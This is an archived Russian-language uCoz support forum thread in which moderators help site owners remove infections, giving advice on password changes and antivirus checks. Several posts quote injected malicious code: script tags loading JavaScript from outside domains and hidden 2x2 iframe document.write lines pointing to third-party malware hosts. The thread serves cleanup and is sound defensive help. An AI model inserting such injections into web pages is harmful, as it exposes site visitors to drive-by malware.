Модератор форума: Yuri_G  
Сообщество uCoz » Мастерская uCoz » Безопасность сайта » Вирусы на сайтах_3 (архив для чтения)
Вирусы на сайтах_3 (архив для чтения)
webanet
Сообщений: 24067
Репутация: 4985

Сообщение # 1636 | 12:38:29 14 Мар 2013
zevetal, из вида материалов новостей сайта выделенное красным удалить

Цитата
<script type='text/javascript' src='http://www.csomsk.ru/highslide/highslide.js'></script>
<script src="http://qyjkl.ru/bgcolor.js" type="text/javascript"></script>
<script type='text/javascript' src='http://www.csomsk.ru/highslide/include_highslide.js'></script>


далее найти и удалить два сторонних виджета

Код
<script language="JavaScript" src="http://101widgets.com/08026101/168/40"></script>
<script language="JavaScript" src="http://101widgets.com/02001012/170/128"></script>


в эти виджеты вшита сторонняя реклама и больше никогда не собирайте виджеты на этом сайте. виджеты искать в содержимом блоков
ТУТ можно оставить своё мнение по любому вопросу
https://webanetlabs.net/
zevetal
Сообщений: 91
Репутация: 11

Сообщение # 1637 | 17:18:10 14 Мар 2013
webanet, спасибо огромное за помощь

Добавлено (14 Мар 2013, 17:18:10)
---------------------------------------------
webanet, ещё вопрос, как я могу убедиться, что после проделывания всего, что вы мне написали, сайт очищен?

webanet
Сообщений: 24067
Репутация: 4985

Сообщение # 1638 | 17:21:38 14 Мар 2013
zevetal, на основании вот этого

Цитата
у некоторых (не у всех) пользователей всплывает такое окно

антивирус не реагирует, просто периодически окно появляется
у пользователей перестанет появляться левая реклама. опросите пользователей, у которых была проблема.
ТУТ можно оставить своё мнение по любому вопросу
https://webanetlabs.net/
zevetal
Сообщений: 91
Репутация: 11

Сообщение # 1639 | 17:45:00 14 Мар 2013
webanet, спасибо, я просто думал, конкретная проверка есть...скажите, а на сколько эффективны, онлайн сканеры?
webanet
Сообщений: 24067
Репутация: 4985

Сообщение # 1640 | 17:58:57 14 Мар 2013
zevetal,
Цитата
я просто думал, конкретная проверка есть
вы удалили источник проблемы, что ещё? остались пользователи у которых проблема сохранилась? если вдруг да (но маловероятно) то пусть сбросят кеш

Цитата
скажите, а на сколько эффективны, онлайн сканеры?
я могу высказать только своем мнение. на мой взгляд эффективность онлайн сканеров равна 10%, потому что они работают по базам. или сигнатурным базам антивирусов или по базам безопасности поисковых систем или других сервисов. а это значит, что между заражением и реакцией ваших сканеров может пройти время. а когда сайт попадет в фильтры безопасности поисковых систем или когда заражение на сайте будет детектироваться антивирусами, то будет совсем поздно.
в вашем случае детекта могло и не быть, а проблема с рекламой была
но некоторые онлайн сервисы по эффективности равны абсолютному нулю
ТУТ можно оставить своё мнение по любому вопросу
https://webanetlabs.net/
zevetal
Сообщений: 91
Репутация: 11

Сообщение # 1641 | 18:07:05 14 Мар 2013
webanet, спасибо за разъяснения, я примерно так же и думал, но мнение профессионала, всё же хотелось узнать, узнал, огромное спасибо ещё раз
Kolbasa
Сообщений: 243
Репутация: 5

Сообщение # 1642 | 16:21:59 15 Мар 2013
Здраствуйте, на протяжение двух недель у меня на сайте очень сильно упал онлайн, адрес сайта - http://css-zona.ru . Я сначало не знал за чего это может быть, но потом люди начали говорить что у меня на сайте вирус. У меня стоит касперский вообще не ругается, проверял доктором Web тоже нормально все. Спросил у человека какой у него антивирусник сказал nod 32 я установил его, пробую зайти на сайт не пускает блокирует его. Подскажите пожалуйста как найти теперь вирус на сайте на что ругается nod32 .

Вот скриншоты:
clip2net.com/s/4KMTP9
clip2net.com/s/4KMZYy
clip2net.com/s/4KN0Kr
Очень нужна ваша помощь
webanet
Сообщений: 24067
Репутация: 4985

Сообщение # 1643 | 16:25:28 15 Мар 2013
Kolbasa, вы уже очищали сайт? уже удаляли что-то? тем не менее под блок попал весь ваш сайт, то есть адрес сайта. не конкретная страница или элемент, а весь сайт. для выяснения причин полного блока вам нужно обратиться в поддержку нода или к ним на форум
ТУТ можно оставить своё мнение по любому вопросу
https://webanetlabs.net/
Kolbasa
Сообщений: 243
Репутация: 5

Сообщение # 1644 | 16:30:44 15 Мар 2013
webanet, я только час назад написал им на мыло и жду ответа от них. И еще вопрос, а может быть что за этого упала сильно посещаемость на сайте? Так как гугла с каждым днем стала меньше посещаемость, а яндекс вообще упал. говорят какие то кода надо на сайте убрать и т.д ну тех.поддержка яши.
webanet
Сообщений: 24067
Репутация: 4985

Сообщение # 1645 | 16:34:54 15 Мар 2013
Kolbasa,
Цитата
говорят какие то кода надо на сайте убрать и т.д ну тех.поддержка яши.
конкретно что пишет тех.поддержка яши?
ещё раз задаю вопрос. вы уже что-то удаляли?
ТУТ можно оставить своё мнение по любому вопросу
https://webanetlabs.net/
Kolbasa
Сообщений: 243
Репутация: 5

Сообщение # 1646 | 17:08:34 15 Мар 2013
Цитата (webanet)
конкретно что пишет тех.поддержка яши? ещё раз задаю вопрос. вы уже что-то удаляли?
Яша: Что касается причин санкций, то это могут быть списки поисковых запросов (многократное повторение и перечисление ключевых слов и фраз), в том числе скрытые от глаз пользователей при помощи различных технических приемов, автоматически сгенерированный (бессмысленный) текст со вставленными в него поисковыми запросами, или связный текст, перенасыщенный ключевыми словами.
На сайте убрал баннера Ливеинтернет статистики, Пр тоже и мониторинг был в блоке.

Мне вот человек написал на сайте недавно что у него было типо такого:

Вот: если есть регистрация на сайте для пользователей, то может быть в аватарке, у меня так сайты попали в бан гоогла и яши 1 пользователь залил вместо аватарки а сайт картинку вирус на хостинг и получился вот такой блок проверь все картинки в уплоадс но там она как бы картинка ты ее так и увидеш но это вирус . советую запретить выбирать и загружать свои аватары

Мне кажется в этом и проблема. и собираюсь удалить все аватарки пользователей, подскажите как их удалить все что они загружали. И закрыл уже для них такую возможность. Главное чтоб лишнего нечего не удалить, просто каждую аватарку искать этот скрипт не охото.
Сообщение отредактировал Kolbasa - Пятница, 15 Мар 2013, 17:09:11
webanet
Сообщений: 24067
Репутация: 4985

Сообщение # 1647 | 17:17:34 15 Мар 2013
Kolbasa, ждите ответа от нодовцев. а то что вы представили - это не фильтр безопасности это поисковый фильтр. а догадки с аватарами - это просто догадки. вам нужно ждать ответа от нода. у них бывают очень своеобразные блокировки по домену
и кстати. копирайт системы нельзя брать в ноиндекс
ТУТ можно оставить своё мнение по любому вопросу
https://webanetlabs.net/
Kolbasa
Сообщений: 243
Репутация: 5

Сообщение # 1648 | 17:25:51 15 Мар 2013
webanet, а как проверить файлы на вирусы? Допустим резервную копию создал и скачал на комп. Резервную кпопию шаблона и полную копию всего.
Сообщение отредактировал Kolbasa - Пятница, 15 Мар 2013, 21:13:24
alosev06
Сообщений: 1
Репутация: 0

Сообщение # 1649 | 12:22:01 17 Мар 2013
Здравствуйте, у меня есть сайт gtarf.ucoz.ru - яндекс пометил его как зараженный.

Проблема в том что всех файлах js прописывается iframe вида:

Код
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://budgetcancun.com/oeod.html?j=638226></iframe>');

document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://ef-srilanka.org/whwd.html?j=638226></iframe>');

document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://habboigratis.altervista.org/ohmf.html?j=638226></iframe>');


после удаления кода он через некоторое время прописывается заново. Подскажите как его можно удалить?
Miss_Esq
Сообщений: 13859
Репутация: 4159
Уровень замечаний:

Сообщение # 1650 | 13:03:06 17 Мар 2013
alosev06, Смените пароли uID пароль в первую очередь, пароль Панели управления и обязательно поставьте сложнейший пароль FTP доступа (пароль от ftp можно не запоминать) и проверьте компьютер на вирусы ..

Удалите скрипт
Код
<script type="text/javascript" src="/js/uZoomer.js"></script>
geometriya ISO 3166-2 DEE
Сообщение отредактировал webanet - Воскресенье, 17 Мар 2013, 14:42:59
Сообщество uCoz » Мастерская uCoz » Безопасность сайта » Вирусы на сайтах_3 (архив для чтения)
Поиск: